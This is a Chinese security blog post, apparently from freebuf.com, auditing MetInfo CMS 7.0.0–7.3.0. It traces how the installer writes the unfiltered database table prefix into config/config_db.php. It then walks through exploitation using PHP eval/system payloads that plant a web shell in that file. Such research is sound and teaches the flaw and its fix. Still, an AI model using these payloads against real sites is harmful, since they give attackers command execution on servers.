米拓建站系统1day审计与利用 – 作者:合天智汇

Metinfocms命令执行

前话

米拓企业建站系统是一款由长沙信息科技有限公司自主研发的免费开源企业级CMS,该系统拥有大量的用户使用,及对该款cms进行审计,如果利用CNVD-2021-01930进行进一步深入,其危害的严重性可想而知。

本文涉及相关实验:MetInfo SQL注入(通过该实验掌握MetInfo SQL注入漏洞的原因和利用方法,以及如何修复该漏洞。)

审计过程:

1. Index:拿到源码先看根目录的index.php看看都包含(加载)了什么文件。

headImg.action?news=c0799755-afcb-474d-8f8d-05e8cd1c2ac1.png

2. 关键词:在/app/system/entrance.php看到了配置文件的定义,全局搜索这个

’PATH_CONFIG‘参数。

headImg.action?news=014e1cfb-5b5b-47f0-9624-f5340b37c716.png

全局搜索并找到install/index.php文件下有这个参数,点击跟进查看。

headImg.action?news=5cd76e95-28f7-400d-8c53-bd423e68922f.png

在这个文件的219行有个是接收db数据库参数的方法。

官方说明“$_M”数组:https://doc.metinfo.cn/dev/basics/basics75.html

这里是接收from数据的db_prefix参数。也就是“数据表前缀”内容的值。

headImg.action?news=c6f656a7-d57b-4a93-8d5c-7e7689c8578e.png

往下发现是直接写入tableper然后赋值给config变量。

headImg.action?news=8c41b1a1-d4ad-4710-a576-b4e97dbd76cf.png

并在264行fopen打开/config/config_db.php进行没有安全过滤的字节流(fputs)方式的写入。

headImg.action?news=57c02093-403c-4450-a457-c93831553c94.png

影响版本:7.3.0 – 7.0.0

一、进行7.3.0安装步骤,访问http://127.0.0.1/install/index.php

headImg.action?news=64cafcfa-7a86-42b3-b175-0a1f0d2ebb24.png

二、选中传统安装继续下一步

headImg.action?news=bce0a51e-fb34-4bf5-9d2e-f26cde2a27bf.png

headImg.action?news=a6e6e757-e03e-44ae-8fa0-3e4445ac24bc.png

三、数据库信息进行写shell

代码执行Payload:”/@eval($_GET[‘1’]);/

命令执行Payload:”/@system($_GET[‘1’]);/

代码执行:

headImg.action?news=03898d8d-fc5d-4bd2-9689-1e0f80d609a8.png

headImg.action?news=30dcfda5-42bf-44bc-ba1d-ad2418ccda2b.png

点击保存进行下一步验证,出现这报错信息,可以查看configconfig_db.php文件。

headImg.action?news=9d42d523-697d-4573-8ef5-f0529b4589b3.png

headImg.action?news=ffe4e699-f642-4646-bcbc-bec79d85f0b5.png

成功写入

headImg.action?news=461b2e77-5913-4bec-8da5-c7338e72b1c6.png

命令执行:

headImg.action?news=cfe16ede-0d73-4291-b117-56b819f98b43.png

headImg.action?news=31627047-33b1-43e8-b27d-89e5038ff2d2.png

headImg.action?news=2f787b35-a0b2-480a-9400-7f724b7ae954.png

7.0.0版本:

headImg.action?news=4139712c-7e1c-4c71-96f8-ca66ec437952.pngheadImg.action?news=80017084-4813-41d8-b1d5-06597ff6655f.png

headImg.action?news=e19b2ba3-cd56-4079-9e23-ed5f3c71dd70.png

headImg.action?news=1f3b89b9-8d60-4988-9d51-30222b8a01e2.png

7.1.0版本:

Payload:”/@eval($GET[‘1’]);@system($GET[‘2’]);/

headImg.action?news=bde46aca-08ec-4786-89ea-b366548c9a97.png

headImg.action?news=8eae2f86-f031-41aa-9d1a-32fb271d10c2.png

headImg.action?news=6703c335-29e8-4655-8e7c-00688ba8e62e.png

headImg.action?news=e16b3a3d-1aa8-4600-af23-67dd0d8ad193.png

7.2.0版本:

Payload:”/@eval($GET[‘1’]);@system($GET[‘2’]);/

headImg.action?news=095cce6e-93aa-4b0a-812b-3370ef31a3b0.png

headImg.action?news=17fe5d34-6b43-492b-b87b-f8ddb1760d26.png

headImg.action?news=4e66b739-0c4e-496e-8fec-f7dfd6618315.png

headImg.action?news=ca4c7850-4ddc-4363-9149-73a7880fa37e.png1

来源:freebuf.com 2021-07-01 16:46:50 by: 合天智汇

相关推荐: 会用工具有多可怕,分分钟伪造100万转账截图 – 作者:360手机卫士部

近日,360手机先赔接到用户反馈,兼职网赚被骗上万元。通过对诈骗过程的分析挖掘,尝试对刷单诈骗背后涉及的黑灰产链条及诈骗工具做分析。案例经过用户在朋友圈看到“短视频点赞”的网赚信息,添加了指定的微信公众号。在客服的引导下,进行了短视频点赞,之后对方表示点赞单子…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享